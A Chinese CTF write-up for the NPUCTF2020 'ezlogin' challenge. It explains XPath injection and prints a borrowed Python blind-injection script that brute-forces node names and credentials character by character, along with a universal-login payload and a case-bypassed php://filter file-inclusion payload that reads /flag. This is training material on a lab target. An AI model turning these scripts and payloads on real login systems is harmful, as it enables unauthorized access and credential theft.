刷题[NPUCTF2020]ezlogin

xpath注入

xpath注入这篇文章有关于xpath很详细的解答，包括原理等，详细了解请见此篇.

我个人再稍微讲一讲：

首先它的网站目录下会有一个xml文件，大概格式是这样:

<?xml version="1.0" encoding="UTF-8"?>
<root>
    <id>1</id>
    <name>admin</name>
    <id>2</id>
    <name>karsa</name>
    <id>3</id>
    <name>flaggg</name>
        <flag>flag{karsa is handsome}</flag>
</root>

root是根节点，name是root的子节点。大概是这样的树状结构。flag可能隐藏在这里，或者可能是账号密码，读取flag值或者密码

$xml="/root/name[username='{$username}' and password='{$password}']";

顺便说下，xPath 没有注释一说，所以构造的 payload 要根据语句进行闭合

其实和sql注入很像，也是通过xml语句发现有问题的地方，构造危险代码，爆出信息

比如我们传入username=x' or 1=1 or ''='，密码随意。因为xml的特性：

查询如果不是用[键='值']这种方式的查询，只会返回所有路径标签的值

如果带有[键='值']的查询，会返回和该路径相同的所有路径和该类路径之下节点的所有的值

因为填了两个or，这样即可爆出所有用户名和密码或者实现万能密码登陆。如果有多个节点，继续添加。

之后的payload看文章就好了，真的总结的很好，payload直接用即可

然后一点，为什么不能直接爆出所有的标签呢，因为这又和php有关了。php 只会输出 id 和 username。

我个人认为遇见xpath画一个图有利于理解它的节点情况

解题思路

打开网页，登陆框

实在是各种方法都试了，扫描，源码，f12就看到了一个js文件，登陆成功会转到admin.php，其他没看到任何有用的内容。

找半天发现源码标签有点像xpath，那就试试把

xpath

先试试万能密码发现被过滤了，这里比较麻烦的一点是token值会不断刷新，需要尽快发送数据才行。

他这里比较有意思的地方，正确的时候返回非法操作，再往后试1位会变成用户名或密码错误

这里就不再手工注入了，直接exp

exp

网上找的exp（可能马上会专门出一个requests的博文，然后找些ctf题练练手，自己写）

import requests
import re

s = requests.session()
url ='http://47e7790f-8a53-4efa-988b-7a350ebb91d5.node3.buuoj.cn//login.php'

head ={
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",
    "Content-Type": "application/xml"
}
find =re.compile('<input type="hidden" id="token" value="(.*?)" />')

strs ='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'

flag =''
for i in range(1,100):
    for j in strs:

        r = s.post(url=url)
        token = find.findall(r.text)
        #猜测根节点名称
        payload_1 = "<username>'or substring(name(/*[1]), {}, 1)='{}'  or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0])
        #猜测子节点名称
        payload_2 = "<username>'or substring(name(/root/*[1]), {}, 1)='{}'  or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0])

        #猜测accounts的节点
        payload_3 ="<username>'or substring(name(/root/accounts/*[1]), {}, 1)='{}'  or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0])

        #猜测user节点
        payload_4 ="<username>'or substring(name(/root/accounts/user/*[2]), {}, 1)='{}'  or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0])

        #跑用户名和密码
        payload_username ="<username>'or substring(/root/accounts/user[2]/username/text(), {}, 1)='{}'  or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0])

        payload_password ="<username>'or substring(/root/accounts/user[2]/password/text(), {}, 1)='{}'  or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0])

        print(payload_password)
        r = s.post(url=url,headers=head,data=payload_username)
        print(r.text)

        if "非法操作" in r.text:
            flag+=j
            print(flag)
            break

    if "用户名或密码错误!" in r.text:
        break

print(flag)

exp有两个地方需要注意，1是这个是总的，爆什么在输出那里填哪个payload然后注释掉其他payload就行了，2是根据上图这里提交数据并不用直接在账号处提交，用xml的形式post提交就行了。其他没啥，跟普通的盲注脚本大同小异

然后跑出来的形式大致的结构是这样：

<root>
      <accounts>
            <user>
                  <id></id>
                  <username>gtfly123</username>
                  <password>e10adc3949ba59abbe56e057f20f883e</password>
            </user>
            <user>
                  <id></id>
                  <username>adm1n</username>
                  <password>cf7414b5bdb2e65ee43083f4ddbc4d9f</password>
            </user>
      </accounts>
</root>

这密码一看就经过md5加密了，MD5解密一下，果然，密码就是gtfly123

一开始发现登陆不上，心态爆炸，不知道有啥问题，后面发现账号名不是admin。。。是adm1n。太坑了

登陆成功

发现base64，解密，看这个再看url中，明显是文件包含了，尝试一下。发现有过滤。最后测试一下，使用大小写绕过，用伪协议进行文件读取

?file=pHp://filter/convert.BAse64-encode/resource=/flag

查看源码获得字符串，base64解密获得flag

总结思路

这里一开始没有任何思路，因为访问所有目录都会跳转，也就是说扫描器没有用了，然后其他就发现/static/main.js,如果登陆成功会跳转页面，一开始还在找有没有jwt或者其他js点，看了wp才知道是xpath，这里记一下，又是一种新思路

• 查看源码发现标签有问题，尝试xpath注入
• 通过xpath爆出密码
• 登陆成功获得信息，拿到flag

知识点

• xpath注入
• 盲注exp编写